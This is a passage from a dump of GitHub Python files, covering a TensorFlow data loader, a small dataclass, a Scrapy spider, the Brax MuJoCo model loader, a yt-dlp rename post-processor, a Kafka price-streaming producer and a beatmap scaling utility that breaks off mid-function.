import augmentation as _augmentation\n\n_tde = _tf.data.experimental\n_logging = _logutil.get_logger()\n_FLAGS = _tf.app.flags.FLAGS\n\n\ndef load(machine=None):\n csv.inspect()\n if machine is not None:\n machine.dataset_loader = Loader()\n else:\n return Loader()\n\n\nclass Loader():\n def __init__(self):\n self._streams = {}\n self._generate_stream()\n pass\n\n def _generate_stream(self):\n for key in [key for key in _FLAGS if str(key).endswith('csv')]:\n csv_file = _FLAGS[key]._value\n csv_path = _os.path.join(_FLAGS.dataset_dir, _FLAGS.type,\n csv_file)\n key = str(key).split('_')[0]\n\n for suffix, phase in [(\"train\", _FLAGS.phase_train), (\"eval\", _FLAGS.phase_eval),\n (\"sampling\", _FLAGS.phase_sampling)]:\n data_pool = _tf.data.TextLineDataset([csv_path])\n augs = []\n if key.find('train') >= 0:\n batch_size = _FLAGS.trainset_batch_size\n for _key in [_key for _key in _FLAGS]:\n if str(_key).startswith('augment'):\n aug_flag = _FLAGS[_key]._value\n if aug_flag:\n augs.append(str(_key).split('_')[1])\n elif key.find('valid') >= 0:\n batch_size =3\n elif key.find('test') >= 0:\n batch_size = 3\n elif key.find('ipiu') >= 0:\n batch_size = 3\n else:\n raise AttributeError(\"Invalid batch_size\")\n\n data_pool = data_pool.apply(_tde.shuffle_and_repeat(_FLAGS.buffer_size))\n # data_pool = data_pool.apply(_tde.shuffle_and_repeat(1))\n data_pool = data_pool.apply(_tde.map_and_batch(\n map_func=lambda row: self._read_row(row, phase, augs),\n batch_size=batch_size,\n num_parallel_batches=_FLAGS.num_parallel_batches\n ))\n batch_stream = data_pool.make_one_shot_iterator().get_next()\n\n print(\"Stream generated... \" + key + '_phase_' + suffix)\n self._streams[key + '_phase_' + suffix] = batch_stream\n\n def _read_row(self, csv_row, phase, augs):\n def _pre_processing(stream, phase):\n def _random_crop(stream):\n x, y = stream\n assert x.shape == (_FLAGS.dim_dataset_h, _FLAGS.dim_dataset_w, 3)\n assert x.shape[0] == y.shape[0] and x.shape[1] == y.shape[1]\n size_h, size_w = (_FLAGS.dim_dataset_h, _FLAGS.dim_dataset_w)\n off_w = _tf.cast(_tf.random_uniform([], 0, size_w - _FLAGS.dim_input_w), _tf.int32)\n off_h = _tf.cast(_tf.random_uniform([], 0, size_h - _FLAGS.dim_input_h), _tf.int32)\n\n try:\n _x = _tf.image.crop_to_bounding_box(x, offset_height=off_h, offset_width=off_w,\n target_width=_FLAGS.dim_input_w,\n target_height=_FLAGS.dim_input_h)\n _y = _tf.image.crop_to_bounding_box(y, offset_height=off_h, offset_width=off_w,\n target_width=_FLAGS.dim_input_w,\n target_height=_FLAGS.dim_input_h)\n x = _x\n y = _y\n except Exception as e:\n print(e)\n\n return x, y\n\n # def _center_crop(stream):\n # x, y = stream\n # assert x.shape == (_FLAGS.dim_dataset_h, _FLAGS.dim_dataset_w, 3)\n # assert x.shape[0] == y.shape[0] and x.shape[1] == y.shape[1]\n # size_h, size_w = (_FLAGS.dim_input_h, _FLAGS.dim_input_w)\n #\n # try:\n # _x = _tf.image.resize_image_with_crop_or_pad(x, size_h, size_w)\n # _y = _tf.image.resize_image_with_crop_or_pad(y, size_h, size_w)\n #\n # x = _x\n # y = _y\n # except Exception as e:\n # print(e)\n #\n # return x, y\n\n if phase == _FLAGS.phase_train:\n if str(_FLAGS.type).startswith(\"KITTI\"):\n return _random_crop(stream)\n else:\n return stream\n elif phase == _FLAGS.phase_eval or phase == _FLAGS.phase_sampling or phase==_FLAGS.phase_ipiu:\n return stream\n else:\n raise AttributeError(phase)\n\n rgb_name, gt_name = _tf.decode_csv(csv_row, record_defaults=[[\"\"], [\"\"]])\n rgb_img = self._load_img(rgb_name, channels=3)\n gt_img = self._load_img(gt_name)\n\n 
(rgb_img, gt_img) = _augmentation.augment((rgb_img, gt_img), augs)\n (rgb_img, gt_img) = _pre_processing((rgb_img, gt_img), phase)\n\n return rgb_img, gt_img\n\n def _load_img(self, filename, channels=1):\n file = _tf.read_file(filename)\n if channels == 3:\n image = _tf.image.decode_jpeg(file, channels)\n image = _tf.cast(image, _tf.float32)\n elif channels == 1:\n\n if str(_FLAGS.type).startswith(\"KITTI\"):\n image = _tf.image.decode_png(file, channels, dtype=_tf.uint16)\n image = _tf.cast(image, _tf.float32)\n image = image / 256.0\n image = _tf.where(_tf.less_equal(image, 0.0), -_tf.ones_like(image), image)\n image = _tf.where(_tf.greater_equal(image, _FLAGS.GT_maxima), _tf.ones_like(image) * _FLAGS.GT_maxima,\n image)\n elif str(_FLAGS.type).startswith(\"NYU\"):\n image = _tf.image.decode_png(file, channels)\n image = _tf.cast(image, _tf.float32)\n image = image / 256.0 * _FLAGS.GT_maxima\n else:\n image = _tf.image.decode_png(file, channels)\n image = _tf.cast(image, _tf.float32)\n else:\n return\n image = _tf.image.resize_images(image,\n (_FLAGS.dim_dataset_h, _FLAGS.dim_dataset_w))\n return image\n\n def get_stream_names(self):\n return list(self._streams.keys())\n\n def get_stream_batch(self, sess, phase, stream_name='trainset'):\n try:\n if phase == _FLAGS.phase_train:\n stream_name += '_phase_train'\n elif phase == _FLAGS.phase_eval:\n stream_name += '_phase_eval'\n elif phase == _FLAGS.phase_sampling:\n stream_name += '_phase_sampling'\n\n stream = self._streams[stream_name]\n except KeyError:\n if sess is not None:\n sess.close()\n raise _tf.errors.InternalError(None, None, message=\"Stream named '%s' doesn't exists\" % stream_name)\n\n if sess is not None:\n for retries in range(1, 6):\n try:\n input, label = sess.run(stream)\n except KeyboardInterrupt:\n sess.close()\n raise _tf.errors.CancelledError(None, None, message=\"KeyboardInterrupt\")\n except:\n _logging.warning('\\nGet trainset on batch', 'retry...({})'.format(retries))\n continue\n else:\n return input, label\n raise _tf.errors.DataLossError(None, None, message='Retries expired')\n else:\n return stream\n\n pass\n","repo_name":"SpatialPerceptionNeuralNetwork/Achilles","sub_path":"dataset/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":7845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73433243712","text":"\"\"\"\nIn this class the Engineer person is created.\n\nIt is inherited from the Worker person.\n\"\"\"\n\nfrom dataclasses import dataclass\nfrom src import worker\n\n@dataclass\nclass Engineer(worker.Worker):\n __type: str # type of work\n __company: str # company where the person works.\n __has_master: bool # checks if it has a master degree.\n __has_doctorate: bool # checks if it has a doctorated degree. \n\n @property\n def type(self): # Getter of __type\n return self.__type \n\n @type.setter # Setter of __type\n def type(self, setType):\n self.__type = setType\n\n @property\n def company(self): # Getter of __company\n return self.__company\n\n @company.setter # # Setter of __company\n def company(self, setCompany):\n self.__company = setCompany\n\n def talk(self): # Method to print information about the certain person\n print(\"Hello! 
I am {} {}, I am a {} engineer that works {} a week at {} and I have a salary of {}.\".format(self.firstName,\n self.lastName,self.type,self.weeklyHours,self.company,self.salary))\n print(\"I have a master degree: {}\".format(self.__has_master))\n print(\"I have a doctorate degree: {}\\n\".format(self.__has_doctorate))","repo_name":"Jeziel18/OOP-Person-Task","sub_path":"src/engineer.py","file_name":"engineer.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5919064029","text":"from scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\n\nfrom sosobaike.items import SosobaikeItem\n\nclass SosobkSpider(BaseSpider):\n name = \"sosobk\"\n allowed_domains = [\"soso.com\"]\n start_urls = []\n# start_urls = (\n# 'http://www.soso.com/',\n# )\n\n def __init__(self):\n for i in range(0, 5000):\n url = \"http://baike.soso.com/Search.e?sp=S&sp=F&sp=S%E4%BA%BA%E7%89%A9&p=\" + str(i)\n #url = \"http://baike.soso.com/Search.e?sp=S&sp=F&sp=S%E4%BA%92%E8%81%94%E7%BD%91&p=\" + str(i)\n self.start_urls.append(url)\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n urllist = hxs.select(\"//div[@class='newscont wh_550']/font/a/@href\").extract()\n items = []\n for url in urllist:\n item = SosobaikeItem()\n item['url'] = 'http://baike.soso.com' + url\n items.append(item)\n\n return items\n","repo_name":"rchardzhu/sosobaike","sub_path":"sosobaike/sosobaike/spiders/sosobk.py","file_name":"sosobk.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72475261631","text":"import itertools\nfrom typing import Dict, List, Tuple, TypeVar, Union\nimport warnings\nfrom xml.etree import ElementTree\n\nfrom brax.v2.base import (\n Actuator,\n Box,\n Capsule,\n Convex,\n DoF,\n Geometry,\n Inertia,\n Link,\n Mesh,\n Motion,\n Plane,\n Sphere,\n System,\n Transform,\n)\nfrom brax.v2.geometry import mesh as geom_mesh\nfrom etils import epath\nfrom jax import numpy as jp\nfrom jax.tree_util import tree_map\nimport mujoco\nimport numpy as np\n\n\nGeom = TypeVar('Geom', bound=Geometry)\n\n\n# map from mujoco geom_type to brax geometry string\n_GEOM_TYPE_CLS = {0: Plane, 2: Sphere, 3: Capsule, 6: Box, 7: Mesh}\n\n# map from mujoco joint type to brax joint type string\n_JOINT_TYPE_STR = {\n 0: 'f', # free\n 1: 'b', # ball\n 2: 'p', # prismatic\n 3: 'r', # revolute\n}\n\n# map from mujoco bias type to brax actuator type string\n_ACT_TYPE_STR = {\n 0: 'm', # motor\n 1: 'p', # position\n}\n\n_COLLIDABLES = [\n # ((Geometry, is_static), (Geometry, is_static))\n ((Sphere, False), (Plane, True)),\n ((Sphere, False), (Sphere, False)),\n ((Sphere, False), (Capsule, False)),\n ((Sphere, False), (Box, False)),\n ((Sphere, False), (Mesh, False)),\n ((Capsule, False), (Plane, True)),\n ((Capsule, False), (Capsule, False)),\n ((Capsule, False), (Box, False)),\n ((Capsule, False), (Mesh, False)),\n ((Box, False), (Plane, True)),\n ((Box, False), (Box, False)),\n ((Box, False), (Mesh, False)),\n ((Mesh, False), (Plane, True)),\n ((Mesh, False), (Mesh, False)),\n]\n\n\ndef _fuse_bodies(elem: ElementTree.Element):\n \"\"\"Fuses together parent child bodies that have no joint.\"\"\"\n\n for child in list(elem): # we will modify elem children, so make a copy\n if child.tag == 'body' and 'joint' not in [e.tag for e in child]:\n cpos = child.attrib.get('pos', '0 0 0')\n cpos = np.fromstring(cpos, sep=' 
')\n for grandchild in child:\n # TODO: might need to offset more than just body, geom\n if grandchild.tag in ('body', 'geom') and (cpos != 0).any():\n gcpos = grandchild.attrib.get('pos', '0 0 0')\n gcpos = np.fromstring(gcpos, sep=' ') + cpos\n gcpos = ' '.join('%f' % i for i in gcpos)\n grandchild.attrib['pos'] = gcpos\n elem.append(grandchild)\n elem.remove(child)\n _fuse_bodies(child)\n\n\ndef _get_meshdir(elem: ElementTree.Element) -> Union[str, None]:\n \"\"\"Gets the mesh directory specified by the mujoco compiler tag.\"\"\"\n elem = elem.find('./mujoco/compiler')\n return elem.get('meshdir') if elem is not None else None\n\n\ndef _find_assets(\n elem: ElementTree.Element,\n path: Union[str, epath.Path],\n meshdir: Union[str, None] = None,\n) -> Dict[str, bytes]:\n \"\"\"Loads assets from an xml given a base path.\"\"\"\n assets = {}\n path = epath.Path(path)\n meshdir = meshdir or _get_meshdir(elem)\n fname = elem.attrib.get('file') or elem.attrib.get('filename')\n if fname:\n dirname = path if path.is_dir() else path.parent\n assets[fname] = (dirname / (meshdir or '') / fname).read_bytes()\n\n for child in list(elem):\n assets.update(_find_assets(child, path, meshdir))\n\n return assets\n\n\ndef _get_mesh(mj: mujoco.MjModel, i: int) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Gets mesh from mj at index i.\"\"\"\n last = (i + 1) >= mj.nmesh\n face_start = mj.mesh_faceadr[i]\n face_end = mj.mesh_faceadr[i + 1] if not last else mj.mesh_face.shape[0]\n face = mj.mesh_face[face_start:face_end]\n\n vert_start = mj.mesh_vertadr[i]\n vert_end = mj.mesh_vertadr[i + 1] if not last else mj.mesh_vert.shape[0]\n vert = mj.mesh_vert[vert_start:vert_end]\n\n return vert, face\n\n\ndef _get_name(mj: mujoco.MjModel, i: int) -> str:\n names = mj.names[i:].decode('utf-8')\n return names[: names.find('\\x00')]\n\n\ndef _get_custom(mj: mujoco.MjModel) -> Dict[str, np.ndarray]:\n \"\"\"Gets custom mjcf parameters for brax, with defaults.\"\"\"\n default = {\n 'vel_damping': (0.0, None),\n 'ang_damping': (0.0, None),\n 'baumgarte_erp': (0.1, None),\n 'elasticity': (0.0, 'geom'),\n 'constraint_stiffness': (2000.0, 'body'),\n 'constraint_damping': (150.0, 'body'),\n 'constraint_limit_stiffness': (1000.0, 'body'),\n 'constraint_ang_damping': (0.0, 'body'),\n }\n\n # get numeric default overrides\n for i, ni in enumerate(mj.name_numericadr):\n nsize = mj.numeric_size[i]\n name = _get_name(mj, ni)\n val = mj.numeric_data[mj.numeric_adr[i] : mj.numeric_adr[i] + nsize]\n typ = default[name][1] if name in default else None\n default[name] = (val, typ)\n\n custom = {}\n for name, (val, typ) in default.items():\n size = {'body': mj.nbody, 'geom': mj.ngeom}.get(typ)\n custom[name] = np.repeat(val, size) if size else np.array(val).squeeze()\n\n # get tuple custom overrides\n for i, ni in enumerate(mj.name_tupleadr):\n start, end = mj.tuple_adr[i], mj.tuple_adr[i] + mj.tuple_size[i]\n objtype = mj.tuple_objtype[start:end]\n name = _get_name(mj, ni)\n if not all(objtype[0] == objtype):\n raise NotImplementedError(\n f'All tuple elements \"{name}\" should have the same object type.'\n )\n if objtype[0] not in [1, 5]:\n raise NotImplementedError(\n f'Custom tuple \"{name}\" with objtype=={objtype[0]} is not supported.'\n )\n typ = {1: 'body', 5: 'geom'}[objtype[0]]\n if name in default and default[name][1] != typ:\n raise ValueError(\n f'Custom tuple \"{name}\" is expected to be associated with'\n f' the {default[name][1]} objtype.'\n )\n\n size = {1: mj.nbody, 5: mj.ngeom}[objtype[0]]\n default_val, _ = 
default.get(name, (0.0, None))\n arr = np.repeat(default_val, size)\n objid = mj.tuple_objid[start:end]\n objprm = mj.tuple_objprm[start:end]\n arr[objid] = objprm\n custom[name] = arr\n\n return custom\n\n\ndef _contact_geoms(geom_a: Geom, geom_b: Geom) -> Tuple[Geom, Geom]:\n \"\"\"Converts geometries for contact functions.\"\"\"\n if isinstance(geom_a, Box) and isinstance(geom_b, Box):\n geom_a = geom_mesh.box_hull(geom_a)\n geom_b = geom_mesh.box_hull(geom_b)\n elif isinstance(geom_a, Box) and isinstance(geom_b, Mesh):\n geom_a = geom_mesh.box_hull(geom_a)\n geom_b = geom_mesh.convex_hull(geom_b)\n elif isinstance(geom_a, Mesh) and isinstance(geom_b, Box):\n geom_a = geom_mesh.convex_hull(geom_a)\n geom_b = geom_mesh.box_hull(geom_b)\n elif isinstance(geom_a, Mesh) and isinstance(geom_b, Mesh):\n geom_a = geom_mesh.convex_hull(geom_a)\n geom_b = geom_mesh.convex_hull(geom_b)\n elif isinstance(geom_a, Box):\n geom_a = geom_mesh.box_tri(geom_a)\n elif isinstance(geom_b, Box):\n geom_b = geom_mesh.box_tri(geom_b)\n\n # pad face vertices so that we can broadcast between geom_a and geom_b faces\n if isinstance(geom_a, Convex) and isinstance(geom_b, Convex):\n sa = geom_a.face.shape[-1]\n sb = geom_b.face.shape[-1]\n if sa < sb:\n face = np.pad(geom_a.face, ((0, 0), (0, sb - sa)), 'edge')\n geom_a = geom_a.replace(face=face)\n elif sb < sa:\n face = np.pad(geom_b.face, ((0, 0), (0, sa - sb)), 'edge')\n geom_b = geom_b.replace(face=face)\n\n return geom_a, geom_b\n\n\ndef _contacts_from_geoms(\n mj: mujoco.MjModel, geoms: List[Geom]\n) -> List[Tuple[Geom, Geom]]:\n \"\"\"Gets a list of contact geom pairs.\"\"\"\n collidables = []\n for key_a, key_b in _COLLIDABLES:\n if mj.opt.collision == 1: # only check predefined pairs in mj.pair_*\n geoms_ab = []\n for geom_id_a, geom_id_b in zip(mj.pair_geom1, mj.pair_geom2):\n geom_a, geom_b = geoms[geom_id_a], geoms[geom_id_b]\n static_a, static_b = geom_a.link_idx is None, geom_b.link_idx is None\n cls_a, cls_b = type(geom_a), type(geom_b)\n if (cls_a, static_a) == key_a and (cls_b, static_b) == key_b:\n geoms_ab.append((geom_a, geom_b))\n elif (cls_a, static_a) == key_b and (cls_b, static_b) == key_a:\n geoms_ab.append((geom_b, geom_a))\n elif key_a == key_b: # types match, avoid double counting (a, b), (b, a)\n geoms_a = [g for g in geoms if (type(g), g.link_idx is None) == key_a]\n geoms_ab = list(itertools.combinations(geoms_a, 2))\n else: # types don't match, take every permutation\n geoms_a = [g for g in geoms if (type(g), g.link_idx is None) == key_a]\n geoms_b = [g for g in geoms if (type(g), g.link_idx is None) == key_b]\n geoms_ab = list(itertools.product(geoms_a, geoms_b))\n if not geoms_ab:\n continue\n # filter out self-collisions\n geoms_ab = [(a, b) for a, b in geoms_ab if a.link_idx != b.link_idx]\n # convert the geometries so that they can be used for contact functions\n geoms_ab = [_contact_geoms(a, b) for a, b in geoms_ab]\n collidables.append(geoms_ab)\n\n # meshes with different shapes cannot be stacked, so we group meshes by vert\n # and face shape\n def key_fn(x):\n def get_key(x):\n if isinstance(x, Convex):\n return (x.vert.shape, x.face.shape, x.unique_edge.shape)\n if isinstance(x, Mesh):\n return (x.vert.shape, x.face.shape)\n return -1\n\n return get_key(x[0]), get_key(x[1])\n\n contacts = []\n for geoms_ab in collidables:\n geoms_ab = sorted(geoms_ab, key=key_fn)\n for _, g in itertools.groupby(geoms_ab, key=key_fn):\n geom_a, geom_b = tree_map(lambda *x: np.stack(x), *g)\n contacts.append((geom_a, geom_b))\n\n return 
contacts\n\n\ndef load_model(mj: mujoco.MjModel) -> System:\n \"\"\"Creates a brax system from a MuJoCo model.\"\"\"\n # do some validation up front\n if any(i not in [0, 1] for i in mj.actuator_biastype):\n raise NotImplementedError('Only actuator_biastype in [0, 1] are supported.')\n if mj.opt.integrator != 0:\n raise NotImplementedError('Only euler integration is supported.')\n if mj.opt.cone != 0:\n raise NotImplementedError('Only pyramidal cone friction is supported.')\n if not (mj.actuator_trntype == 0).all():\n raise NotImplementedError(\n 'Only joint transmission types are supported for actuators.'\n )\n\n custom = _get_custom(mj)\n\n # create links\n joint_positions = [np.array([0.0, 0.0, 0.0])]\n for _, group in itertools.groupby(\n zip(mj.jnt_bodyid, mj.jnt_pos), key=lambda x: x[0]\n ):\n position = np.array([p for _, p in group])\n if not (position == position[0]).all():\n raise RuntimeError('invalid joint stack: only one joint position allowed')\n joint_positions.append(position[0])\n joint_position = np.array(joint_positions)\n identity = np.tile(np.array([1.0, 0.0, 0.0, 0.0]), (mj.nbody, 1))\n link = Link(\n transform=Transform(pos=mj.body_pos, rot=mj.body_quat),\n inertia=Inertia(\n transform=Transform(pos=mj.body_ipos, rot=mj.body_iquat),\n i=np.array([np.diag(i) for i in mj.body_inertia]),\n mass=mj.body_mass,\n ),\n invweight=mj.body_invweight0[:, 0],\n joint=Transform(pos=joint_position, rot=identity),\n constraint_stiffness=custom['constraint_stiffness'],\n constraint_damping=custom['constraint_damping'],\n constraint_limit_stiffness=custom['constraint_limit_stiffness'],\n constraint_ang_damping=custom['constraint_ang_damping'],\n )\n # skip link 0 which is the world body in mujoco\n link = tree_map(lambda x: x[1:], link)\n\n # create dofs\n mj.jnt_range[~(mj.jnt_limited == 1), :] = np.array([-np.inf, np.inf])\n motions, limits, stiffnesses = [], [], []\n for typ, axis, limit, stiffness in zip(\n mj.jnt_type, mj.jnt_axis, mj.jnt_range, mj.jnt_stiffness\n ):\n if typ == 0:\n motion = Motion(ang=np.eye(6, 3, -3), vel=np.eye(6, 3))\n limit = np.array([-np.inf] * 6), np.array([np.inf] * 6)\n if stiffness > 0:\n raise RuntimeError('brax does not support stiffness for free joints')\n stiffness = np.zeros(6)\n elif typ == 1:\n motion = Motion(ang=np.eye(3), vel=np.zeros((3, 3)))\n if np.any(~np.isinf(limit)):\n raise RuntimeError('brax does not support joint ranges for ball joints')\n limit = np.array([-np.inf] * 3), np.array([np.inf] * 3)\n stiffness = np.zeros(3)\n elif typ == 2:\n motion = Motion(ang=np.zeros((1, 3)), vel=axis.reshape((1, 3)))\n limit = limit[0:1], limit[1:2]\n stiffness = np.array([stiffness])\n elif typ == 3:\n motion = Motion(ang=axis.reshape((1, 3)), vel=np.zeros((1, 3)))\n limit = limit[0:1], limit[1:2]\n stiffness = np.array([stiffness])\n else:\n raise RuntimeError(f'invalid joint type: {typ}')\n motions.append(motion)\n limits.append(limit)\n stiffnesses.append(stiffness)\n motion = tree_map(lambda *x: np.concatenate(x), *motions)\n\n limit = None\n if np.any(mj.jnt_limited):\n limit = tree_map(lambda *x: np.concatenate(x), *limits)\n stiffness = np.concatenate(stiffnesses)\n\n dof = DoF(\n motion=motion,\n armature=mj.dof_armature,\n stiffness=stiffness,\n damping=mj.dof_damping,\n limit=limit,\n invweight=mj.dof_invweight0,\n )\n\n # create geoms\n geoms = []\n for i, typ in enumerate(mj.geom_type):\n if typ not in _GEOM_TYPE_CLS:\n warnings.warn(f'unrecognized collider, geom_type: {typ}')\n continue\n\n kwargs = {\n 'link_idx': mj.geom_bodyid[i] 
- 1 if mj.geom_bodyid[i] > 0 else None,\n 'transform': Transform(pos=mj.geom_pos[i], rot=mj.geom_quat[i]),\n 'friction': mj.geom_friction[i, 0],\n 'elasticity': custom['elasticity'][i],\n }\n\n geom_cls = _GEOM_TYPE_CLS[typ]\n if geom_cls is Plane:\n geom = Plane(**kwargs)\n elif geom_cls is Sphere:\n geom = Sphere(radius=mj.geom_size[i, 0], **kwargs)\n elif geom_cls is Capsule:\n geom = Capsule(\n radius=mj.geom_size[i, 0], length=mj.geom_size[i, 1] * 2, **kwargs\n )\n elif geom_cls is Box:\n geom = Box(halfsize=mj.geom_size[i, :], **kwargs)\n elif geom_cls is Mesh:\n vert, face = _get_mesh(mj, mj.geom_dataid[i])\n geom = Mesh(vert=vert, face=face, **kwargs)\n geoms.append(geom)\n\n contacts = _contacts_from_geoms(mj, geoms)\n\n # create actuators\n ctrl_range = mj.actuator_ctrlrange\n ctrl_range[~(mj.actuator_ctrllimited == 1), :] = np.array([-np.inf, np.inf])\n actuator = Actuator(\n gear=mj.actuator_gear[:, 0],\n ctrl_range=ctrl_range,\n )\n\n # create non-pytree params. these do not live on device directly, and they\n # cannot be differentiated, but they do change the emitted control flow\n link_names = [_get_name(mj, i) for i in mj.name_bodyadr[1:]]\n # convert stacked joints to 1, 2, or 3\n link_types = ''\n for _, group in itertools.groupby(\n zip(mj.jnt_bodyid, mj.jnt_type), key=lambda x: x[0]\n ):\n typs = [t for _, t in group]\n if len(typs) == 1 and typs[0] == 0: # free\n typ = 'f'\n elif 0 in typs:\n raise RuntimeError('invalid joint stack: cannot stack free joints')\n elif 1 in typs:\n raise NotImplementedError('ball joints not supported')\n else:\n typ = str(len(typs))\n link_types += typ\n link_parents = tuple(mj.body_parentid - 1)[1:]\n\n # create non-pytree params for actuators.\n actuator_types = ''.join([_ACT_TYPE_STR[bt] for bt in mj.actuator_biastype])\n actuator_link_id = [mj.jnt_bodyid[i] - 1 for i in mj.actuator_trnid[:, 0]]\n unsupported_act_links = set(link_types[i] for i in actuator_link_id) - {\n '1',\n '2',\n '3',\n }\n if unsupported_act_links:\n raise NotImplementedError(\n f'Link types {unsupported_act_links} are not supported for actuators.'\n )\n actuator_qid = [mj.jnt_qposadr[i] for i in mj.actuator_trnid[:, 0]]\n actuator_qdid = [mj.jnt_dofadr[i] for i in mj.actuator_trnid[:, 0]]\n\n # mujoco stores free q in world frame, so clear link transform for free links\n if 'f' in link_types:\n free_idx = np.array([i for i, typ in enumerate(link_types) if typ == 'f'])\n link.transform.pos[free_idx] = np.zeros(3)\n link.transform.rot[free_idx] = np.array([1.0, 0.0, 0.0, 0.0])\n\n sys = System(\n dt=mj.opt.timestep,\n gravity=mj.opt.gravity,\n link=link,\n dof=dof,\n geoms=geoms,\n contacts=contacts,\n actuator=actuator,\n init_q=custom['init_qpos'] if 'init_qpos' in custom else mj.qpos0,\n vel_damping=custom['vel_damping'],\n ang_damping=custom['ang_damping'],\n baumgarte_erp=custom['baumgarte_erp'],\n link_names=link_names,\n link_types=link_types,\n link_parents=link_parents,\n actuator_types=actuator_types,\n actuator_link_id=actuator_link_id,\n actuator_qid=actuator_qid,\n actuator_qdid=actuator_qdid,\n solver_iterations=mj.opt.iterations,\n )\n\n sys = tree_map(jp.array, sys)\n\n return sys\n\n\ndef fuse_bodies(xml: str):\n \"\"\"Fuses together parent child bodies that have no joint.\"\"\"\n xml = ElementTree.fromstring(xml)\n _fuse_bodies(xml)\n return ElementTree.tostring(xml, encoding='unicode')\n\n\ndef loads(xml: str, asset_path: Union[str, epath.Path, None] = None) -> System:\n \"\"\"Loads a brax system from a MuJoCo mjcf xml string.\"\"\"\n elem = 
ElementTree.fromstring(xml)\n _fuse_bodies(elem)\n assets = {} if asset_path is None else _find_assets(elem, asset_path)\n xml = ElementTree.tostring(elem, encoding='unicode')\n mj = mujoco.MjModel.from_xml_string(xml, assets=assets)\n\n return load_model(mj)\n\n\ndef load(path: Union[str, epath.Path]):\n \"\"\"Loads a brax system from a MuJoCo mjcf file path.\"\"\"\n elem = ElementTree.fromstring(epath.Path(path).read_text())\n _fuse_bodies(elem)\n assets = _find_assets(elem, path)\n xml = ElementTree.tostring(elem, encoding='unicode')\n mj = mujoco.MjModel.from_xml_string(xml, assets=assets)\n\n return load_model(mj)\n","repo_name":"FloyedShen/Metaplasticity","sub_path":"Dependencies/brax/brax/v2/io/mjcf.py","file_name":"mjcf.py","file_ext":"py","file_size_in_byte":17395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14794864282","text":"\"\"\"Post-processing module.\"\"\"\n\nfrom __future__ import annotations\nfrom yt_dlp.postprocessor.common import PostProcessor, PostProcessingError\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING\nimport re\n\nif TYPE_CHECKING:\n from typing import Any\n\nclass RenameFixFilePP(PostProcessor):\n \"\"\"Renames a file.\"\"\"\n\n def run(self, info: dict[str, Any]):\n ext: str = '.' + info['ext']\n print(\"extension:\", ext)\n\n filepath: str = info['filepath']\n infile = Path('./' + filepath).resolve()\n\n def _re_sub(m: re.Match) -> str:\n if m[0] == ' ':\n return '_'\n return ''\n\n filepath = re.sub(r'[\\[\\]() ]', _re_sub, filepath)\n outfile = Path('./' + filepath).resolve()\n\n try:\n infile.rename(outfile)\n except FileNotFoundError as exc:\n raise PostProcessingError(str(exc))\n except PermissionError as exc:\n raise PostProcessingError(str(exc))\n\n info['filepath'] = outfile.name\n\n return [], info\n","repo_name":"JohnDevlopment/yt-dlp-tk","sub_path":"src/yt_dlp_tk/yt_funcs/postprocessing.py","file_name":"postprocessing.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11260575506","text":"import pandas as pd\nimport json\ndf = pd.read_csv('VNI-test.csv')\n\nlist_price = [\"Price\", \"Open\", \"High\", \"Low\"]\nfor i in list_price:\n df[i] = pd.to_numeric(df[i].apply(lambda x: x.replace(\",\", \"\")))\n\nBOOTSTRAP_SERVER = 'localhost'\nTOPIC = 'myTest'\n\nfrom kafka import KafkaProducer\nproducer = KafkaProducer(bootstrap_servers=[BOOTSTRAP_SERVER])\n\ncol = []\nfor i in range(0, 7):\n col.append(df.columns[i])\n\ndef send(tmp):\n '''s = \"\"\n for i in range(0,6):\n s = s + col[i] + \": \" + str(tmp[i]) + \"-\"'''\n s = {}\n for i in range(0, 7):\n s[col[i]] = tmp[i]\n print(\"Message: \", s)\n producer.send(TOPIC, value = json.dumps(s).encode('utf-8'))\n\nimport time\ntiming = 0.5\nfor i in range(df.shape[0]-1, -1, -1):\n tmp = list(df.loc[i])\n send(tmp)\n time.sleep(timing)\n","repo_name":"HungThinhLuu/OS_KSTN","sub_path":"Code_Streaming/kafka2topic.py","file_name":"kafka2topic.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22470023553","text":"import numpy as np\nfrom . 
import utils\n\n\ndef scale(beatmap:np.ndarray, scale:float, log = True, integer = True) -> np.ndarray:\n    if isinstance(scale, str): scale = utils._safer_eval(scale)\n    assert scale>0, f\"scale should be > 0, your scale is {scale}\"\n    if scale == 1: return beatmap\n    else:\n        import math\n        if log is True: print(f'scale={scale}; ')\n        a = 0\n        b = np.array([], dtype=int)\n        if scale%1==0:\n            while a < len(beatmap):\n                b = np.append(b, beatmap[int(a)])\n                a += scale\n        else:\n            if integer is True:\n                while a + 1 < len(beatmap):\n                    b = np.append(b, int((1 - (a % 1)) * beatmap[math.floor(a)] + (a % 1) * beatmap[math.ceil(a)]))\n                    a += scale\n            else:\n                while a + 1 < len(beatmap):\n                    b = np.append(b, (1 - (a % 1)) * beatmap[math.floor(a)] + (a % 1) * beatmap[math.ceil(a)])\n                    a += scale\n        return b\n    \ndef shift(beatmap:np.ndarray, shift:float, log = True, mode = 1) -> np.ndarray:\n    if isinstance(shift, str): shift = utils._safer_eval(shift)\n    if shift == 0: return beatmap\n    # positive shift\n    elif shift > 0:\n        # full value of beats is removed from the beginning\n        if shift >= 1: beatmap = beatmap[int(shift//1):]\n        # shift beatmap by the decimal value\n        if shift%1 != 0:\n            shift = shift%1\n            for i in range(len(beatmap) - int(shift) - 1):\n                beatmap[i] = int(beatmap[i] + shift * (beatmap[i + 1] - beatmap[i]))\n\n    # negative shift\n    else:\n        shift = -shift\n        # full values are inserted in between first beats\n        if shift >= 